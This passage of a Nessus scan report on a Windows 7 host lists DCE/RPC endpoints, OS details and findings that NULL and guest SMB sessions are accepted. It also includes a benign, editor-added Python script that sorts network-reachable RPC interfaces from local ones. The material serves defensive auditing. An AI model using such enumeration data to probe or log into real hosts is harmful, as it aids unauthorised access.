UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0

Description : Unknown RPC service

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0

Description : Unknown RPC service

Annotation : IP Transition Configuration endpoint 

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0

Description : Unknown RPC service

Annotation : XactSrv service

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\srvsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\browser

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\srvsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\browser

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\srvsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\browser

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\srvsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

Named pipe : \PIPE\browser

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Remote RPC service

Named pipe : \PIPE\srvsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Remote RPC service

Named pipe : \PIPE\browser

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0

Description : Unknown RPC service

Annotation : Event log TCPIP

Type : Remote RPC service

Named pipe : \pipe\eventlog

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0

Description : Unknown RPC service

Annotation : NRP server endpoint 

Type : Remote RPC service

Named pipe : \pipe\eventlog

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint 

Type : Remote RPC service

Named pipe : \pipe\eventlog

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint 

Type : Remote RPC service

Named pipe : \pipe\eventlog

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Remote RPC service

Named pipe : \pipe\eventlog

Netbios name : \\WIN7

Nessus ID : 10736 
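The DCE Services Enumeration listings in this report (TCP 49152 above, the \PIPE\ endpoints on 445 just listed, and the epmap listing on 135 further down that starts with "available locally") repeat the same interface UUIDs once per endpoint, which is why they run to many pages. The question a reviewer actually needs answered is narrower: which interfaces bind to an endpoint reachable from the network (a "Remote RPC service" on a named pipe or a TCP port) as opposed to an ALPC endpoint only a local process can open (the "Local RPC service" entries such as LRPC-... and OLE...). The Python script below is an added example, not part of the original report and not Nessus code: it parses plugin 10736 output in the format printed above into one record per "Object UUID" block, de-duplicates endpoints per interface UUID, and flags a small hand-maintained table of well-known interfaces. SAMPLE is constructed from records on this page; the names in KNOWN_INTERFACES are the editor's own annotations, not scanner output.

```python
import re

# Hand-maintained map of well-known interface UUIDs (lower-case) to a name;
# these are editor annotations, not Nessus output.
KNOWN_INTERFACES = {
    "12345778-1234-abcd-ef00-0123456789ac": "samr (MS-SAMR, account database)",
    "1ff70682-0a51-30e8-076d-740be8cee98b": "atsvc (MS-TSCH, AT-style jobs)",
    "378e52b0-c0a9-11cf-822d-00aa0051e40f": "sasec (MS-TSCH, job credentials)",
    "86d35949-83c9-4044-b424-db363231fd0c": "ITaskSchedulerService (MS-TSCH)",
    "f6beaff7-1e19-4fbb-9f8f-b89e2018337c": "eventlog (MS-EVEN6)",
}

# Constructed sample in the exact layout plugin 10736 prints; the records are
# copied from the 445/tcp, 49152/tcp and 135/tcp listings in this report.
SAMPLE = r"""
The following DCERPC services are available remotely :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
Named pipe : \pipe\lsass
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Type : Remote RPC service
Named pipe : \PIPE\protected_storage
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49152
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : samss lpc
"""

UUID_RE = re.compile(r"([0-9a-f-]{36}),\s*version\s+([\d.]+)", re.IGNORECASE)


def parse_dce_records(text):
    """One dict per 'Object UUID' block; every field is a 'Key : Value' line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if " : " not in line:            # banner lines carry no ' : ' separator
            continue
        key, value = (p.strip() for p in line.split(" : ", 1))
        if key == "Object UUID":         # start of a new record
            current = {"Object UUID": value.lower()}
            records.append(current)
        elif current is None:
            continue
        elif key == "UUID":              # split 'uuid, version N.N'
            m = UUID_RE.match(value)
            current["UUID"], current["version"] = m.group(1).lower(), m.group(2)
        else:
            current[key] = value
    return records


def endpoint(rec):
    r"""Binding as one string; pipe names are case-insensitive, so \PIPE\x == \pipe\x."""
    if "Named pipe" in rec:
        return rec["Named pipe"].lower()
    if "TCP Port" in rec:
        return f"{rec.get('IP', '?')}:{rec['TCP Port']}/tcp"
    return "?"


def summarize(records):
    """Interface UUID -> name plus de-duplicated endpoint sets.
    'Remote RPC service' is a named pipe (over SMB) or a TCP port, reachable
    from the network; 'Local RPC service' is an ALPC endpoint, host-local only."""
    summary = {}
    for rec in records:
        uuid = rec.get("UUID", "?")
        entry = summary.setdefault(uuid, {
            "name": KNOWN_INTERFACES.get(uuid, rec.get("Description", "Unknown RPC service")),
            "remote": set(), "local": set()})
        bucket = "remote" if rec.get("Type", "").startswith("Remote") else "local"
        entry[bucket].add(endpoint(rec))
    return summary


def remotely_reachable_known(records):
    """Well-known interfaces that bind to at least one network endpoint."""
    return sorted((uuid, info["name"], sorted(info["remote"]))
                  for uuid, info in summarize(records).items()
                  if uuid in KNOWN_INTERFACES and info["remote"])


if __name__ == "__main__":
    recs = parse_dce_records(SAMPLE)
    for uuid, info in summarize(recs).items():
        print(f"{uuid}  {info['name']}\n    remote: {sorted(info['remote']) or '-'}"
              f"\n    local : {sorted(info['local']) or '-'}")
    for uuid, name, eps in remotely_reachable_known(recs):
        print(f"network-reachable: {name} via {', '.join(eps)}")
```

Fed the full 445 listing, the script collapses the Security Account Manager entries to two network-reachable pipes (\pipe\lsass and \PIPE\protected_storage) and the Scheduler Service entries to \PIPE\atsvc, while the "samss lpc", LRPC-... and OLE... endpoints from the 135 listing stay in the local set and never count as exposure. Whether an anonymous session can actually open those pipes depends on the host's NullSessionPipes and RestrictAnonymous settings, which this report does not capture; the NULL session finding further down only shows that an anonymous SMB session is accepted.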

SMB NativeLanMan 

Synopsis : 

It is possible to obtain information about the remote operating

system.

Description : 

It is possible to get the remote operating system name and

version (Windows and/or Samba) by sending an authentication

request to port 139 or 445.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

The remote Operating System is : Windows 7 Professional 7600

The remote native lan manager is : Windows 7 Professional 6.1

The remote SMB Domain Name is : WIN7

Nessus ID : 10785 

SMB log in 

Synopsis : 

It is possible to log into the remote host.

Description : 

The remote host is running one of the Microsoft Windows operating

systems. It was possible to log into it using one of the following

accounts :

- NULL session

- Guest account 

- Given Credentials

See also : 

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP 

http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP 

Solution : 

n/a

Risk factor : 

None

Plugin output : 

- NULL sessions are enabled on the remote host 

CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595

BID : 494, 990, 11199

Nessus ID : 10394 

SMB LanMan Pipe Server browse listing 

Synopsis : 

It is possible to obtain network information.

Description : 

It was possible to obtain the browse list of the remote Windows system

by sending a request to the LANMAN pipe. The browse list is the list of

the nearest Windows systems of the remote host.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

Here is the browse list of the remote host :

WIN7 ( os : 6.1 )

Other references : OSVDB:300

Nessus ID : 10397 

SMB NULL session 

Synopsis : 

It is possible to log into the remote Windows host with a NULL session.

Description : 

The remote host is running Microsoft Windows, and it was possible to

log into it using a NULL session (ie, with no login or password). An

unauthenticated remote attacker can leverage this issue to get 

information about the remote host.

See also : 

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP 

http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP 

Solution : 

n/a

Risk factor : 

None

CVE : CVE-2002-1117

BID : 494

Nessus ID : 26920 

SMB registry can not be accessed by the scanner 

Synopsis : 

Nessus is not able to access the remote Windows Registry.

Description : 

It was not possible to connect to PIPE\winreg on the remote host.

If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote

Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied

credentials.

Solution : 

n/a

Risk factor : None

Nessus ID : 26917 

Port epmap (135/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper

PIPE) it was possible to enumerate the Distributed Computing Environment 

(DCE) services running on the remote port.

Using this information it is possible to connect and bind to

each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available locally :

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91

UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : WindowsShutdown

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91

UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : WMsgKRpc0436C0

Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000

UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : WindowsShutdown

Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000

UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : WMsgKRpc0436C0

Object UUID : 6d726574-7273-0076-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0

Description : Unknown RPC service

Annotation : Impl friendly name

Type : Local RPC service

Named pipe : LRPC-c6a2c9660bb6328c4f 

Object UUID : 52ef130c-08fd-4388-86b3-6edf00000001

UUID : 12e65dd8-887f-41ef-91bf-8d816c42c2e7, version 1.0

Description : Unknown RPC service

Annotation : Secure Desktop LRPC interface

Type : Local RPC service

Named pipe : WMsgKRpc043881

Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001

UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : WMsgKRpc043881

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0

Description : IPsec Services (Windows XP & 2003)

Windows process : lsass.exe

Annotation : IPSec Policy agent endpoint 

Type : Local RPC service

Named pipe : LRPC-ca5f5144be75bc564b

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0

Description : Unknown RPC service

Annotation : Remote Fw APIs

Type : Local RPC service

Named pipe : LRPC-ca5f5144be75bc564b

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : OLE25D40AF7017C4837B051B3DE1DA2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : trkwks

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 8174bb16-571b-4c38-8386-1102b449044a, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a2d47257-12f7-4beb-8981-0ebfa935c407, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3f31c91e-2545-4b7b-9311-9529e8bffef6, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 4b112204-0e19-11d3-b42b-0000f81feb9f, version 1.0

Description : SSDP service

Windows process : unknow

Type : Local RPC service

Named pipe : LRPC-4348df7c4ffce47473

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0

Description : Unknown RPC service

Annotation : Base Firewall Engine API

Type : Local RPC service

Named pipe : LRPC-5448665e392adc7390

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0

Description : Unknown RPC service

Annotation : Fw APIs

Type : Local RPC service

Named pipe : LRPC-5448665e392adc7390

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0

Description : Unknown RPC service

Annotation : Fw APIs

Type : Local RPC service

Named pipe : LRPC-5448665e392adc7390

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0

Description : Unknown RPC service

Annotation : Spooler function endpoint 

Type : Local RPC service

Named pipe : spoolss

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0

Description : Unknown RPC service

Annotation : Spooler base remote object endpoint

Type : Local RPC service

Named pipe : spoolss

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0

Description : Unknown RPC service

Annotation : Spooler function endpoint 

Type : Local RPC service

Named pipe : spoolss

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : LRPC-04dfdd309d86a33c86

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : audit

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : securityevent 

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : LSARPC_ENDPOINT

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : lsapolicylookup

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : lsasspirpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : protected_storage

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Local RPC service

Named pipe : samss lpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : LRPC-04dfdd309d86a33c86

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : audit 

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : securityevent 

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : LSARPC_ENDPOINT

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : lsapolicylookup

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : lsasspirpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : protected_storage

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Local RPC service

Named pipe : samss lpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0

Description : Unknown RPC service

Annotation : NSI server endpoint 

Type : Local RPC service

Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0

Description : Unknown RPC service

Annotation : NSI server endpoint 

Type : Local RPC service

Named pipe : LRPC-a1978a56cbce044c9e

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0

Description : Unknown RPC service

Annotation : WinHttp Auto-Proxy Service

Type : Local RPC service

Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0

Description : Unknown RPC service

Annotation : WinHttp Auto-Proxy Service

Type : Local RPC service

Named pipe : LRPC-a1978a56cbce044c9e

Object UUID : 666f7270-6c69-7365-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0

Description : Unknown RPC service

Annotation : Impl friendly name

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 6c637067-6569-746e-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0

Description : Unknown RPC service

Annotation : Impl friendly name

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601

UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601

UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 736e6573-0000-0000-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0

Description : Unknown RPC service

Annotation : Impl friendly name

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 736e6573-0000-0000-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0

Description : Unknown RPC service

Annotation : Impl friendly name

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 736e6573-0000-0000-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0

Description : Unknown RPC service

Annotation : Impl friendly name

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0

Description : Unknown RPC service

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0

Description : Unknown RPC service

Annotation : IP Transition Configuration endpoint 

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0

Description : Unknown RPC service

Annotation : IP Transition Configuration endpoint 

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0

Description : Unknown RPC service

Annotation : IP Transition Configuration endpoint 

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0

Description : Unknown RPC service

Annotation : XactSrv service

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0

Description : Unknown RPC service

Annotation : XactSrv service

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0

Description : Unknown RPC service

Annotation : XactSrv service

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

